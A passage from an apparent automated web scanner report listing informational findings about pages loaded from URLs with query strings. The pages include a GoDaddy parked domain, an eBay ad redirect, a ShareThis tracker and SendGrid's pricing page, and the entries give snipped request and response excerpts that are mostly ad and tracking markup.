src="http://images-pw.secureserver.net/images/bul_blacksquare.png" class="blackbullet"/> <a class="footerlink2" href="http://www.godaddy.com/email/email-hosting.aspx?isc=gppt05C023&domain=powermta1.com"> Email accounts</a><img src="http://images-pw.secureserver.net/images/bul_blacksquare.png" class="blackbullet"/> <a class="footerlink2" href="http://www.godaddy.com/ssl/ssl-certificates.aspx?isc=gppt05C023&domain=powermta1.com"> SSL Certificates</a><img src="http://images-pw.secureserver.net/images/bul_blacksquare.png" class="blackbullet"/> <a class="footerlink2" href="http://www.godaddy.com/gdshop/ecommerce/shopping-cart.asp?isc=gppt05C023&domain=powermta1.com"> eCommerce tools</a><img src="http://images-pw.secureserver.net/images/bul_blacksquare.png" class="blackbullet"/> <a class="footerlink2" href="http://www.godaddy.com/gdshop/catalog.asp?isc=gppt05C023&domain=powermta1.com"> See product catalog</a>...[SNIP]... <a href="http://videos.godaddy.com/super-bowl-commercials.aspx?isc=gppt05C024&domain=powermta1.com" class="footerlink1"> Go Daddy Super Bowl® Commercial</a><img src="http://images-pw.secureserver.net/images/bul_bluesquare.png" class="blackbullet"/> <a href="http://videos.godaddy.com/danica-media.aspx?isc=gppt05C024&domain=powermta1.com" class="footerlink1"> Danica Patrick</a><img src="http://images-pw.secureserver.net/images/bul_bluesquare.png" class="blackbullet"/> <a href="http://videos.godaddy.com/dale_video.aspx?isc=gppt05C024&domain=powermta1.com" class="footerlink1"> Dale Jr</a><img src="http://images-pw.secureserver.net/images/bul_bluesquare.png" class="blackbullet"/> <a href="http://videos.godaddy.com/girls.aspx?isc=gppt05C024&domain=powermta1.com" class="footerlink1"> Go Daddy Girls®</a>...[SNIP]... <a href="http://www.godaddy.com/agreements/ShowDoc.aspx?pageid=privacy_parkedpage" target="_blank"> Privacy Policy</a>...[SNIP]...
15.36. http://powermta1.com/wp-content/plugins/cforms/styling/sidebar-layout.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://powermta1.com
Path:
/wp-content/plugins/cforms/styling/sidebar-layout.css
Issue detail
The page was loaded from a URL containing a query string:http://powermta1.com/wp-content/plugins/cforms/styling/sidebar-layout.css?f389a660 http://as.casalemedia.com/sd?s=95308&f=1 http://images-pw.secureserver.net/images/100YearsOfChevy.gif http://images-pw.secureserver.net/images/ban_auctions.png http://images-pw.secureserver.net/images/ban_expired.png http://images-pw.secureserver.net/images/btn_red_go.png http://images-pw.secureserver.net/images/bul_blacksquare.png http://images-pw.secureserver.net/images/bul_bluesquare.png http://images-pw.secureserver.net/images/gd/49574_gdd_trialpay.gif http://images-pw.secureserver.net/images/img_PPC_RedTag.png http://images-pw.secureserver.net/images/img_Searchsidebar_dotCOh.gif http://images-pw.secureserver.net/images/img_footertext2.png http://images-pw.secureserver.net/images/log_icann.png http://images-pw.secureserver.net/images/logo_gd.png http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js http://videos.godaddy.com/dale_video.aspx?isc=gppt05C024&domain=powermta1.com http://videos.godaddy.com/danica-media.aspx?isc=gppt05C024&domain=powermta1.com http://videos.godaddy.com/girls.aspx?isc=gppt05C024&domain=powermta1.com http://videos.godaddy.com/super-bowl-commercials.aspx?isc=gppt05C024&domain=powermta1.com http://www.bobparsons.me/?isc=gppt05C026&domain=powermta1.com http://www.godaddy.com/?isc=GPPT05C001&domain=powermta1.com http://www.godaddy.com/?isc=gppt05C003&domain=powermta1.com http://www.godaddy.com/?isc=gppt05C004&domain=powermta1.com http://www.godaddy.com/?isc=gppt05C022&domain=powermta1.com http://www.godaddy.com/?logolinks=true&isc=GPPT05C001&domain=powermta1.com http://www.godaddy.com/Business/business-hosting.aspx?isc=gppt05C015&domain=powermta1.com http://www.godaddy.com/Business/business-hosting.aspx?isc=gppt05C018&domain=powermta1.com http://www.godaddy.com/Hosting/Legacy.aspx?isc=gppt05C012&domain=powermta1.com http://www.godaddy.com/Hosting/Legacy.aspx?isc=gppt05C023&domain=powermta1.com http://www.godaddy.com/Hosting/web-hosting-4gh.aspx?isc=gppt05C144&domain=powermta1.com http://www.godaddy.com/agreements/ShowDoc.aspx?pageid=privacy_parkedpage http://www.godaddy.com/design/web-design.aspx?isc=gppt05C053&domain=powermta1.com http://www.godaddy.com/domains/search.aspx?isc=gppt05C005&domain=powermta1.com http://www.godaddy.com/domains/search.aspx?isc=gppt05C006&domain=powermta1.com http://www.godaddy.com/domains/search.aspx?isc=gppt05C023&domain=powermta1.com http://www.godaddy.com/ecommerce/shopping-cart.aspx?isc=gppt05C051&domain=powermta1.com http://www.godaddy.com/email/email-hosting.aspx?isc=gppt05C017&domain=powermta1.com http://www.godaddy.com/email/email-hosting.aspx?isc=gppt05C023&domain=powermta1.com http://www.godaddy.com/email/email-hosting.aspx?isc=gppt05C035&domain=powermta1.com http://www.godaddy.com/gdshop/catalog.asp?isc=gppt05C023&domain=powermta1.com http://www.godaddy.com/gdshop/ecommerce/shopping-cart.asp?isc=gppt05C023&domain=powermta1.com http://www.godaddy.com/gdshop/hosting/dream_website.asp?isc=gppt05C013&domain=powermta1.com http://www.godaddy.com/gdshop/myportal/domainren.asp?ci=13324&isc=GPPT05C030&domain=powermta1.com http://www.godaddy.com/hosting/website-builder.aspx?isc=gppt05C010&domain=powermta1.com http://www.godaddy.com/hosting/website-builder.aspx?isc=gppt05C011&domain=powermta1.com http://www.godaddy.com/hosting/website-builder.aspx?isc=gppt05C023&domain=powermta1.com http://www.godaddy.com/hosting/website-builder.aspx?isc=gppt05C050&domain=powermta1.com http://www.godaddy.com/ssl/ssl-certificates.aspx?isc=gppt05C016&domain=powermta1.com http://www.godaddy.com/ssl/ssl-certificates.aspx?isc=gppt05C023&domain=powermta1.com http://www.godaddy.com/tlds/co-domain.aspx?isc=gppt05C036&domain=powermta1.com https://auctions.godaddy.com/?isc=gppt05C007&domain=powermta1.com https://auctions.godaddy.com/trpItemListing.aspx?ci=13325&isc=GPPT05C031&domain=powermta1.com&domaintocheck=powermta1.com
Request
GET /wp-content/plugins/cforms/styling/sidebar-layout.css?f389a660 HTTP/1.1.port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A;q=0.3
Response
HTTP/1.1 200 OK97088384; domain=powermta1.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... <script language="javascript" src="http://as.casalemedia.com/sd?s=95308&f=1"> </script>...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"> </script>...[SNIP]... <img src="http://images-pw.secureserver.net/images/ban_expired.png" style="background-repeat: no-repeat; "/> ; position: absolute; left: 173px; top: 7px; font-size: 16px; color: #cc0000; font-weight: bold;">...[SNIP]... <a href="http://www.godaddy.com?isc=GPPT05C001&domain=powermta1.com"> <img src="http://images-pw.secureserver.net/images/logo_gd.png" usemap="#lmap" border="0" alt="This web page is parked FREE, courtesy of GoDaddy.com" > </a>...[SNIP]... <area shape="poly" coords="0,0,150,0,150,80,80,80,80,60,0,60,0,0" alt="GoDaddy.com" href="http://www.godaddy.com?isc=GPPT05C001&domain=powermta1.com"/> <area shape="rect" coords="14,60,80,85" alt="GoDaddy.com" href="http://www.godaddy.com?logolinks=true&isc=GPPT05C001&domain=powermta1.com"/> ...[SNIP]... <a style="text-decoration: none; font-size: 16px; color: #cc0000; font-weight: bold;" href="http://www.godaddy.com/gdshop/myportal/domainren.asp?ci=13324&isc=GPPT05C030&domain=powermta1.com"> <div>...[SNIP]... "><img src="http://images-pw.secureserver.net/images/btn_red_go.png" border="0" /> </div>...[SNIP]... <img src="http://images-pw.secureserver.net/images/100YearsOfChevy.gif"style="border-color:#ffffff;"usemap="#ngMap"/> ...[SNIP]... <img src="http://images-pw.secureserver.net/images/gd/49574_gdd_trialpay.gif" style="border-color:#ffffff;" usemap="#tpMap"/> ...[SNIP]... ; text-align:center; font-size: 14px; font-family: Arial, Helvetica, sans-serif;"><img src="http://images-pw.secureserver.net/images/ban_auctions.png" border="0" style="overflow: hidden;" usemap="#exMap"/> <area shape="rect" coords="1,1,511,104" alt="Interested in this domain? Get it at the Go Daddy Auctions™" href="https://auctions.godaddy.com/trpItemListing.aspx?ci=13325&isc=GPPT05C031&domain=powermta1.com&domaintocheck=powermta1.com"/> ...[SNIP]... <a href="http://www.godaddy.com/domains/search.aspx?isc=gppt05C006&domain=powermta1.com" > domain names</a>...[SNIP]... <a href="https://auctions.godaddy.com?isc=gppt05C007&domain=powermta1.com" > Go Daddy Auctions®</a>...[SNIP]... <a href="http://www.godaddy.com/hosting/website-builder.aspx?isc=gppt05C011&domain=powermta1.com" > sitebuilders!</a>...[SNIP]... <a href="http://www.godaddy.com/Hosting/Legacy.aspx?isc=gppt05C012&domain=powermta1.com" > website hosting</a>...[SNIP]... <a href="http://www.godaddy.com/gdshop/hosting/dream_website.asp?isc=gppt05C013&domain=powermta1.com" > Web pros</a>...[SNIP]... ; position:absolute; text-align:center; margin-top: 379px; margin-left: 368px; "><a style="font-size: 18px; font-weight: bold; color: #fff; font-family: Arial,Helvetica; text-decoration:none;" href="http://www.godaddy.com/Hosting/web-hosting-4gh.aspx?isc=gppt05C144&domain=powermta1.com" > Starting at</a>...[SNIP]... ; position:absolute; text-align:center; margin-top: 400px; margin-left: 374px; "><a style="font-size: 22px; font-weight: bold; color: #fff; font-family: Arial,Helvetica; text-decoration:none;" href="http://www.godaddy.com/Hosting/web-hosting-4gh.aspx?isc=gppt05C144&domain=powermta1.com" > $5.99<span style="font-size: 16px; color: #fff; font-family: Arial,Helvetica; text-decoration:none;">...[SNIP]... <img style="position:absolute; margin-top: 456px; margin-left:214px;" src="http://images-pw.secureserver.net/images/img_PPC_RedTag.png"/> <a href="http://www.godaddy.com/hosting/website-builder.aspx?isc=gppt05C050&domain=powermta1.com" style="text-decoration:none; color:#000;"> ...[SNIP]... <a href="http://www.bobparsons.me?isc=gppt05C026&domain=powermta1.com" style="text-decoration:none; color:#000;"> <div style="font-size:11px; color:#000; overflow:hidden; text-decoration:none; padding-top:13px; height:55px; cursor:pointer;">...[SNIP]... <a href="http://www.godaddy.com/ssl/ssl-certificates.aspx?isc=gppt05C016&domain=powermta1.com" > SSL Certificates</a>...[SNIP]... <a href="http://www.godaddy.com/email/email-hosting.aspx?isc=gppt05C017&domain=powermta1.com" > Fast, spam-free email</a>...[SNIP]... <a href="http://www.godaddy.com/Business/business-hosting.aspx?isc=gppt05C018&domain=powermta1.com" > Marketing tools</a>...[SNIP]... <a style="font-size: 22px; font-weight: bold; color: #ff0000; font-family: Arial,Helvetica; text-decoration:none;" href="http://www.godaddy.com/email/email-hosting.aspx?isc=gppt05C035&domain=powermta1.com" > Starting at</a>...[SNIP]... <a style="font-size: 22px; font-weight: bold; color: #ff0000; font-family: Arial,Helvetica; text-decoration:none;" href="http://www.godaddy.com/email/email-hosting.aspx?isc=gppt05C035&domain=powermta1.com" > </a>...[SNIP]... <a href="http://www.godaddy.com/design/web-design.aspx?isc=gppt05C053&domain=powermta1.com" style="text-decoration:none; color:#000;"> ...[SNIP]... <a href="http://www.godaddy.com/ecommerce/shopping-cart.aspx?isc=gppt05C051&domain=powermta1.com" style="text-decoration:none; color:#000;"> ...[SNIP]... <img class="rightclear" src="http://images-pw.secureserver.net/images/img_Searchsidebar_dotCOh.gif" usemap="#dsMap" /> </div><area shape="rect" coords="15,5,158,67" alt="GoDaddy.com" href="http://www.godaddy.com?isc=gppt05C004&domain=powermta1.com"/> <area shape="rect" coords="420,35,500,52" alt="GoDaddy.com" href="http://www.godaddy.com?isc=gppt05C003&domain=powermta1.com"/> <area shape="poly" coords="23,70,190,70,190,94,95,94,95,130,23,130,23,70" alt="Domains" href="http://www.godaddy.com/domains/search.aspx?isc=gppt05C005&domain=powermta1.com"/> <area shape="rect" coords="24,130,495,174" alt="Get the domain you really want with a .CO!" href="http://www.godaddy.com/tlds/co-domain.aspx?isc=gppt05C036&domain=powermta1.com"/> ;redirectToDomainSearch();" /><area shape="poly" coords="23,288,195,288,195,309,105,309,105,348,23,348,23,288" alt="Websites" href="http://www.godaddy.com/hosting/website-builder.aspx?isc=gppt05C010&domain=powermta1.com"/> <area shape="rect" coords="24,365,495,444" alt="Affordable web hosting" href="http://www.godaddy.com/Hosting/web-hosting-4gh.aspx?isc=gppt05C144&domain=powermta1.com"/> <area shape="rect" coords="18,454,498,534" alt="WebSite Tonight®" href="http://www.godaddy.com/hosting/website-builder.aspx?isc=gppt05C050&domain=powermta1.com"/> <area shape="rect" coords="19,538,498,613" alt="www.bobparsons.me" href="http://www.bobparsons.me?isc=gppt05C026&domain=powermta1.com"/> <area shape="poly" coords="23,626,320,626,320,658,105,658,105,686,23,686,23,626" alt="Everything in between" href="http://www.godaddy.com/Business/business-hosting.aspx?isc=gppt05C015&domain=powermta1.com"/> <area shape="rect" coords="18,739,498,816" alt="Dream Big!" href="http://www.godaddy.com/design/web-design.aspx?isc=gppt05C053&domain=powermta1.com"/> <area shape="rect" coords="18,826,498,903" alt="Quick Shopping Cart®" href="http://www.godaddy.com/ecommerce/shopping-cart.aspx?isc=gppt05C051&domain=powermta1.com"/> ...[SNIP]... <img src="http://images-pw.secureserver.net/images/log_icann.png" style="position: relative; left: 635px;" /> <a href="http://www.godaddy.com?isc=gppt05C022&domain=powermta1.com"> <img src="http://images-pw.secureserver.net/images/img_footertext2.png" border="0"/> </a>...[SNIP]... <a class="footerlink2" href="http://www.godaddy.com/domains/search.aspx?isc=gppt05C023&domain=powermta1.com"> Domain names</a><img src="http://images-pw.secureserver.net/images/bul_blacksquare.png" class="blackbullet"/> <a class="footerlink2" href="http://www.godaddy.com/Hosting/Legacy.aspx?isc=gppt05C023&domain=powermta1.com"> Web hosting</a><img src="http://images-pw.secureserver.net/images/bul_blacksquare.png" class="blackbullet"/> <a class="footerlink2" href="http://www.godaddy.com/hosting/website-builder.aspx?isc=gppt05C023&domain=powermta1.com"> Website builders</a><img src="http://images-pw.secureserver.net/images/bul_blacksquare.png" class="blackbullet"/> <a class="footerlink2" href="http://www.godaddy.com/email/email-hosting.aspx?isc=gppt05C023&domain=powermta1.com"> Email accounts</a><img src="http://images-pw.secureserver.net/images/bul_blacksquare.png" class="blackbullet"/> <a class="footerlink2" href="http://www.godaddy.com/ssl/ssl-certificates.aspx?isc=gppt05C023&domain=powermta1.com"> SSL Certificates</a><img src="http://images-pw.secureserver.net/images/bul_blacksquare.png" class="blackbullet"/> <a class="footerlink2" href="http://www.godaddy.com/gdshop/ecommerce/shopping-cart.asp?isc=gppt05C023&domain=powermta1.com"> eCommerce tools</a><img src="http://images-pw.secureserver.net/images/bul_blacksquare.png" class="blackbullet"/> <a class="footerlink2" href="http://www.godaddy.com/gdshop/catalog.asp?isc=gppt05C023&domain=powermta1.com"> See product catalog</a>...[SNIP]... <a href="http://videos.godaddy.com/super-bowl-commercials.aspx?isc=gppt05C024&domain=powermta1.com" class="footerlink1"> Go Daddy Super Bowl® Commercial</a><img src="http://images-pw.secureserver.net/images/bul_bluesquare.png" class="blackbullet"/> <a href="http://videos.godaddy.com/danica-media.aspx?isc=gppt05C024&domain=powermta1.com" class="footerlink1"> Danica Patrick</a><img src="http://images-pw.secureserver.net/images/bul_bluesquare.png" class="blackbullet"/> <a href="http://videos.godaddy.com/dale_video.aspx?isc=gppt05C024&domain=powermta1.com" class="footerlink1"> Dale Jr</a><img src="http://images-pw.secureserver.net/images/bul_bluesquare.png" class="blackbullet"/> <a href="http://videos.godaddy.com/girls.aspx?isc=gppt05C024&domain=powermta1.com" class="footerlink1"> Go Daddy Girls®</a>...[SNIP]... <a href="http://www.godaddy.com/agreements/ShowDoc.aspx?pageid=privacy_parkedpage" target="_blank"> Privacy Policy</a>...[SNIP]...
15.37. http://rover.ebay.com/ar/1/711-53200-19255-108/1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://rover.ebay.com
Path:
/ar/1/711-53200-19255-108/1
Issue detail
The page was loaded from a URL containing a query string:http://rover.ebay.com/ar/1/711-53200-19255-108/1?campid=5336830850&toolid=7115320019255108&customid=&mpt=206427233991&adtype=3&size=300x250&mpvc= http://img-cdn.mediaplex.com/0/711/53200/2011_DD_Generic_300x250.gif
Request
GET /ar/1/711-53200-19255-108/1?campid=5336830850&toolid=7115320019255108&customid=&mpt=206427233991&adtype=3&size=300x250&mpvc= HTTP/1.1;q=0.354388197505092ad^cguid/62d7951f1320a479e7268c86ff361dd1505092ad^
Response
HTTP/1.1 200 OK*ts67.%6052f505-1327309143d543881975054aa8f^cguid/62d7951f1320a479e7268c86ff361dd15054aa8f^; Domain=.ebay.com; Expires=Sat, 15-Sep-2012 16:19:27 GMT; Path=/.com/rover/1/711-53200-19255-108/1?mpt=206427233991&toolid=7115320019255108&customid=&campid=5336830850&rvr_id=265440014577&imp_rvr_id=265440014577&mpvc="><img ismap border=0 src="http://img-cdn.mediaplex.com/0/711/53200/2011_DD_Generic_300x250.gif" > </a>...[SNIP]...
15.38. http://search.altn.com/search
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://search.altn.com
Path:
/search
Issue detail
The page was loaded from a URL containing a query string:http://search.altn.com/search?proxystylesheet=default_frontend&output=xml_no_dtd&site=nonpartner_collection&client=default_frontend&q=xss
Request
GET /search?proxystylesheet=default_frontend&output=xml_no_dtd&site=nonpartner_collection&client=default_frontend&q=xss HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1316207681.1316207681.1316207681.1; __utmb=1.4.10.1316207681; __utmc=1; __utmz=1.1316207681.1.1.utmgclid=CNC9_rqUoqsCFeUZQgodLn8qig|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.0 200 OK">...[SNIP]... <a href="http://www.rim.com/" target="_blank"> <img src="http://www.altn.com/Images/Logos/RIM_small.png" alt="Research In Motion" border="0" title="Research In Motion">...[SNIP]...
15.39. http://seg.sharethis.com/getSegment.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://seg.sharethis.com
Path:
/getSegment.php
Issue detail
The page was loaded from a URL containing a query string:http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.blackbaud.com%2F&jsref=&rnd=1316204996203 http://cm.g.doubleclick.net/pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A http://pixel.rubiconproject.com/tap.php?v=6432&rnd1316186960 http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544462&t=2&rnd1316186960 http://www.googleadservices.com/pagead/conversion.js
Request
GET /getSegment.php?purl=http%3A%2F%2Fwww.blackbaud.com%2F&jsref=&rnd=1316204996203 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3T7FCnHuAg==
Response
HTTP/1.1 200 OK, CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"/html4/loose.dtd">;charset=UTF-8">...[SNIP]... .com/impr?campaign=adx-impr" alt=""/><img src="http://cm.g.doubleclick.net/pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A" alt=""/> <script type="text/javascript">...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]... <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script><img src="http://pixel.rubiconproject.com/tap.php?v=6432&rnd1316186960" alt="" width="1" height="1" /> <img src="http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544462&t=2&rnd1316186960" alt=""/> ...[SNIP]...
15.40. http://sendgrid.com/pricing.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://sendgrid.com
Path:
/pricing.html
Issue detail
The page was loaded from a URL containing a query string:http://sendgrid.com/pricing.html?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ http://ad.retargeter.com/seg?add=78586&t=2 http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400 http://d2gramajkvysi4.cloudfront.net/images/pricing/help-small.gif?r=1309887400 http://d2gramajkvysi4.cloudfront.net/images/social/rss.gif?r=1309887434 http://d2gramajkvysi4.cloudfront.net/images/social/twitter.gif?r=1309887433 http://d2gramajkvysi4.cloudfront.net/js/new/placeholders.gz.js?r=1309887505 http://edge.quantserve.com/quant.js http://pixel.quantserve.com/pixel/p-de_F6qVUp9bug.gif?labels=_fp.event.Pricing+Page http://static.sendgrid.com.s3.amazonaws.com/favicon.ico http://twitter.com/SendGrid http://twitter.com/sendgrid http://www.facebook.com/SendGrid https://s3.amazonaws.com/static.sendgrid.com/jquery/1.4.4/jquery.min.js https://s3.amazonaws.com/static.sendgrid.com/jqueryui/1.8.6/jquery-ui.min.js https://s3.amazonaws.com/static.sendgrid.com/jqueryui/1.8.6/redmond/jquery-ui-1.8.6.custom.css https://snapabug.appspot.com/statusImage?w=7fb75ba1-1d49-422a-826e-726147108e42 https://snapabug.appspot.com/statusImage?w=8d68486b-56f8-4224-9862-8ffa3106ecfb
Request
GET /pricing.html?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ HTTP/1.1.com/smtp-with-bullet-points/?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3&token:_mch-sendgrid.com-1316204836485-43033; __utma=139434414.731002222.1316204836.1316204836.1316204836.1; __utmb=139434414.2.10.1316204836; __utmc=139434414; __utmz=139434414.1316204836.1.1.utmgclid=CPWo1PSJoqsCFRRSgwod8HVslQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; __ptca=111872475.dUUOzxbhAvTn.1316222838.1316222838.1316222838.1; __ptv_0a6gTR=dUUOzxbhAvTn; __pti_0a6gTR=dUUOzxbhAvTn; __ptcc=1; __ptcs=111872475.1.10.1316222838; __ptcz=111872475.1316222838.1.0.ptmcsr=google|ptmcmd=organic|ptmccn=(organic)|ptmctr=smtp+server|ptmcex=9GFPhk.3Gp89g.1|ptmcx2=9GFPhk.3Gp89g.1
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... <link rel="shortcut icon" href="http://static.sendgrid.com.s3.amazonaws.com/favicon.ico" /> .com/css/default.gz.css?r=1316132374" />...[SNIP]... <script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/jquery/1.4.4/jquery.min.js"> </script><script type="text/javascript" src="https://s3.amazonaws.com/static.sendgrid.com/jqueryui/1.8.6/jquery-ui.min.js"> </script><link rel="stylesheet" type="text/css" href="https://s3.amazonaws.com/static.sendgrid.com/jqueryui/1.8.6/redmond/jquery-ui-1.8.6.custom.css" /> .com/css/extra.gz.css?r=1315604479" />...[SNIP]... .sendgrid.com/tickets/new" onclick="SnapABug.setWidgetId('8d68486b-56f8-4224-9862-8ffa3106ecfb');return SnapABug.startLink();"><img src="https://snapabug.appspot.com/statusImage?w=8d68486b-56f8-4224-9862-8ffa3106ecfb" border="0"> </img>...[SNIP]... :54px;cursor:pointer;" onclick="SnapABug.setWidgetId('7fb75ba1-1d49-422a-826e-726147108e42');return SnapABug.startLink();"><img src="https://snapabug.appspot.com/statusImage?w=7fb75ba1-1d49-422a-826e-726147108e42" border="0"> </img>...[SNIP]... <img src="http://ad.retargeter.com/seg?add=78586&t=2" width="1" height="1" alt=""/> ...[SNIP]... <img alt="help" class="tooltip-help" id="dedicated_ip_help" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/help-small.gif?r=1309887400" /> </label>...[SNIP]... <img alt="help" class="tooltip-help" id="subuser_help" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/help-small.gif?r=1309887400" /> </label>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" 